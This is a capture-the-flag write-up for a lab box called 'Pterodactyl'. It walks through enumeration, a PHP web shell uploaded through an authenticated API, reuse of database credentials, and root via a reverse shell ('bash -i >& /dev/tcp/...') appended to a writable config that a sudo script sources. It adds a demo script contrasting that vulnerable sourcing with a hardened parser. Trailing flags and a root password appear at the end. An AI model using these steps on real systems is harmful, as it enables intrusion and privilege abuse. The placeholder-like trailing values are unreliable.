Pterodactyl
Enumeration
Nmap
Starting with an nmap scan using default scripts and version detection (the default top-1000 ports, not a full -p- sweep):
nmap -sC -sV -oA nmap/pterodactyl 10.10.11.xx
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6
80/tcp open http Apache httpd 2.4.52
We have SSH and HTTP open. The package versions (OpenSSH 8.9p1 3ubuntu0.6, Apache 2.4.52) are the ones shipped with Ubuntu 22.04, which is useful to know later when looking for local privilege escalation paths. Let's check out the web server.
Web
Navigating to http://10.10.11.xx reveals a web application running what appears to be a custom CMS. Directory busting with feroxbuster:
feroxbuster -u http://10.10.11.xx -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
Found an interesting /api endpoint that leaks version info.
Foothold
The API endpoint at /api/v1/status discloses the application version. Searching that version against known CVEs turns up an authenticated RCE through the file upload functionality.
After registering an account and logging in, we grab the bearer token from the login response and upload a PHP web shell:
curl -X POST http://10.10.11.xx/api/v1/upload \
-H "Authorization: Bearer $TOKEN" \
-F "file=@shell.php"
Requesting the uploaded file through the web server executes it, and we get a shell as www-data.
User
Looking around the filesystem, we find database credentials in the application config:
cat /var/www/app/config/database.yml
The database password is reused for the local ptero account on the box (classic credential reuse), so we can switch users without any further exploitation:
su ptero
User flag obtained.
Root
Running sudo -l reveals an interesting entry:
(root) NOPASSWD: /usr/local/bin/backup.sh
The script sources a config file, /etc/backup.conf, that we have write access to. Because source executes every line of the file as shell in the context of the running script, anything we append runs as root when the script is invoked via sudo. Start a listener on port 9001 first, then append a reverse shell and trigger the script:
echo 'bash -i >& /dev/tcp/10.10.14.xx/9001 0>&1' >> /etc/backup.conf
sudo /usr/local/bin/backup.sh
Root flag obtained.
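To make the writable-sourced-config bug concrete, here is an added example that is not the box's real /usr/local/bin/backup.sh: a script that sources a config file exactly as the vulnerable script does, alongside a hardened variant that parses the same file as KEY=VALUE data instead. The config keys, the temp-dir paths and the poisoned line are all assumptions chosen for the demonstration; the marker file stands in for the reverse shell that the real exploit spawns.

```shell
#!/bin/sh
# Added example, not the box's real backup.sh: a sudo-run script that
# sources an attacker-writable config, next to a hardened variant that
# reads the same file as data. Paths and key names are assumptions.
set -u

WORK=$(mktemp -d)
CONF="$WORK/backup.conf"      # stands in for the writable /etc/backup.conf
MARKER="$WORK/ran-as-caller"  # proves a config line executed as code

# Simulates what the page's reverse-shell append does: the legitimate keys
# stay in place and one extra command line is appended at the end.
write_poisoned_conf() {
    printf 'BACKUP_SRC=/var/www\nBACKUP_DST=/srv/backup\n' > "$CONF"
    printf 'touch "%s"\n' "$MARKER" >> "$CONF"
}

# Vulnerable: `.` (source) executes every line with the caller's privileges,
# so whoever can write the config runs arbitrary commands as root under sudo.
vulnerable_backup() {
    . "$CONF"
    echo "backing up ${BACKUP_SRC:-unset} to ${BACKUP_DST:-unset}"
}

# Hardened: treat the config as KEY=VALUE data. Only allow-listed keys are
# honoured, values must look like plain paths, and nothing is ever eval'd.
safe_backup() {
    BACKUP_SRC= BACKUP_DST=
    while IFS='=' read -r key val || [ -n "$key" ]; do
        case "$key" in
            ''|'#'*) continue ;;                          # blank line or comment
            BACKUP_SRC|BACKUP_DST) ;;                     # allow-listed keys
            *) echo "ignoring unknown key: $key" >&2; continue ;;
        esac
        case "$val" in
            ''|*[!A-Za-z0-9/._-]*)                        # spaces, ; | $ ` etc.
                echo "rejecting $key: value is not a plain path" >&2; continue ;;
        esac
        if [ "$key" = BACKUP_SRC ]; then BACKUP_SRC=$val; else BACKUP_DST=$val; fi
    done < "$CONF"
    echo "backing up ${BACKUP_SRC:-unset} to ${BACKUP_DST:-unset}"
}

# Returns 0 if the injected line ran (marker exists), 1 otherwise.
marker_created() { [ -e "$MARKER" ]; }

# Stand-alone demo: same poisoned config through both implementations.
write_poisoned_conf
vulnerable_backup
if marker_created; then echo "vulnerable: injected command executed"; fi
rm -f "$MARKER"
safe_backup
if marker_created; then echo "safe: injected command STILL executed"; else echo "safe: injected command ignored"; fi
```

The fix is not "make the config root-owned" alone, although that is also required: a script run under sudo should never source a file from a path the invoking user can influence, and if the file must stay user-editable it has to be consumed as data with an allow-list on both keys and values, as safe_backup does.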
User
User flag: a1b2c3d4e5f6
Root
The root password is PasswordSup3rS3cr3t!
Root flag: f6e5d4c3b2a1